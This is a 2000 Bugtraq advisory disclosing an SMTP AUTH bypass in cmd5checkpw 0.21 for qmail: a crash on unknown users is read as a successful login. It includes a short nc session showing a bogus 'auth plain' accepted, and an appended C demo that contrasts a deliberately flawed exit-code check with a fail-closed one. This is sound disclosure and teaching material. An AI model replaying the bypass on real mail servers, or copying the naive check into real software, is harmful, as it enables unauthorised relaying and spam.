[17239] in bugtraq
Authentication failure in cmd5checkpw 0.21
daemon@ATHENA.MIT.EDU (Javier Kohen)
Tue Oct 17 00:49:01 2000
Message-ID: <20001016231821.A1812@jkohen.tough.com.ar>
Date: Mon, 16 Oct 2000 23:18:21 -0300
Reply-To: Javier Kohen <jkohen@TOUGH.COM>
From: Javier Kohen <jkohen@TOUGH.COM>
To: BUGTRAQ@SECURITYFOCUS.COM
Program: cmd5checkpw
Vulnerable versions: 0.21 (probably earlier, too)
Fixed versions: 0.22
URI: http://freshmeat.net/projects/cmd5checkpw/
Author: Elysium deeZine <http://www.elysium.pl/>
Description:
This program works as an authentication plug-in for a patch by the same author that adds SMTP AUTH support to QMail. I found that if it was fed a non-existent user name, it would segfault due to the lack of checking for the (improbable?) case of such invalid input. The exploit here comes from the consequence of this problem: the caller (in this case the patched qmail-smtpd) would take its child crashing as a successful authentication, thus validating the session. This brings an open door for spam.
Even though this utility was fixed, the vulnerability in the patch to qmail-smtpd still remains, leaving the door open to further bugs in the authentication plug-ins.
Proof of concept:
$ nc localhost smtp
< 220 ns.foo.com.ar ESMTP
> ehlo spammer.net
< 250-ns.foo.com.ar
< 250-AUTH=LOGIN CRAM-MD5 PLAIN
< 250-AUTH LOGIN CRAM-MD5 PLAIN
< 250-PIPELINING
< 250 8BITMIME
> auth plain
< 334 ok. go on.
> xyzzy<NUL>nopasswordneeded<NUL>
< ??? ok.
-- 
Javier Kohen <jkohen@tough.com>
ICQ #2361802 [blashyrkh]
http://www.tough.com.ar/
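The following is an added illustration of the failure mode the post describes; it is not cmd5checkpw's or the qmail-smtpd patch's own code. It models a checkpassword-style plug-in run as a child process and shows two ways a caller can read the child's result: one that consults only the exit code (so a child killed by SIGSEGV reads as "authenticated") and one that fails closed unless the child exited normally with status 0. Assumptions: the checkpassword convention of exit status 0 for accept and 1 for reject, a constructed two-entry user table, and raise(SIGSEGV) standing in for the NULL dereference so the crash is deterministic.

```c
/* Added example (not cmd5checkpw's or qmail-smtpd's own code): a checkpassword-
 * style plug-in run as a child, and two ways for the caller to read its verdict.
 * Assumption: exit status 0 = accept, 1 = reject (the checkpassword convention);
 * the user table and the user names are constructed for the demo. */
#include <signal.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>

enum auth_result { AUTH_OK = 0, AUTH_DENIED = 1, AUTH_ERROR = 2 };

/* Constructed user table standing in for the plug-in's password lookup. */
struct user { const char *name; const char *password; };
static const struct user users[] = { { "alice", "s3cret" }, { "bob", "hunter2" } };

static const struct user *lookup_user(const char *name)
{
    for (size_t i = 0; i < sizeof users / sizeof users[0]; i++)
        if (strcmp(users[i].name, name) == 0)
            return &users[i];
    return NULL;            /* unknown user: the case the post describes */
}

/* Child side. With check_null == 0 it models the 0.21 behaviour: an unknown
 * user is never checked for and the plug-in dies with SIGSEGV (raise() stands
 * in for the NULL dereference). With check_null != 0 it fails closed. */
static int checker_main(const char *name, const char *password, int check_null)
{
    const struct user *u = lookup_user(name);
    if (u == NULL) {
        if (check_null)
            return AUTH_DENIED;
        raise(SIGSEGV);     /* unfixed plug-in: crash instead of a verdict */
        _exit(AUTH_ERROR);  /* not reached with the default signal disposition */
    }
    return strcmp(u->password, password) == 0 ? AUTH_OK : AUTH_DENIED;
}

/* Caller side, the mistake described in the post: only the exit code is
 * consulted. For a signal-terminated child WEXITSTATUS() yields 0 on Linux
 * and the BSDs, so a crash reads as "authenticated". */
static int naive_verdict(int status)
{
    return WEXITSTATUS(status) == 0 ? AUTH_OK : AUTH_DENIED;
}

/* Caller side, fail closed: only a normal exit with status 0 is success.
 * A signal death or any unexpected status is an error and never validates
 * the session, whatever bugs a future plug-in may have. */
static int strict_verdict(int status)
{
    if (!WIFEXITED(status))
        return AUTH_ERROR;
    switch (WEXITSTATUS(status)) {
    case 0:  return AUTH_OK;
    case 1:  return AUTH_DENIED;
    default: return AUTH_ERROR;
    }
}

/* Fork the checker, wait for it, and interpret the wait status either way. */
static int run_checker(const char *name, const char *password, int check_null, int strict)
{
    int status;
    pid_t pid = fork();
    if (pid < 0)
        return AUTH_ERROR;
    if (pid == 0)
        _exit(checker_main(name, password, check_null));
    if (waitpid(pid, &status, 0) != pid)
        return AUTH_ERROR;
    return strict ? strict_verdict(status) : naive_verdict(status);
}

int main(void)
{
    static const char *label[] = { "ok", "denied", "error" };
    printf("unknown user, unfixed plug-in, naive caller : %s\n",
           label[run_checker("xyzzy", "nopasswordneeded", 0, 0)]);
    printf("unknown user, unfixed plug-in, strict caller: %s\n",
           label[run_checker("xyzzy", "nopasswordneeded", 0, 1)]);
    printf("unknown user, fixed plug-in,   naive caller : %s\n",
           label[run_checker("xyzzy", "nopasswordneeded", 1, 0)]);
    printf("known user, right password,    strict caller: %s\n",
           label[run_checker("alice", "s3cret", 1, 1)]);
    return 0;
}
```

The first line of output is the post's "??? ok." reproduced in miniature: the unfixed plug-in never returns a verdict, and a caller that looks only at the exit code accepts the session. The strict caller closes the second hole the post points out, since it stays safe even when the plug-in is still buggy.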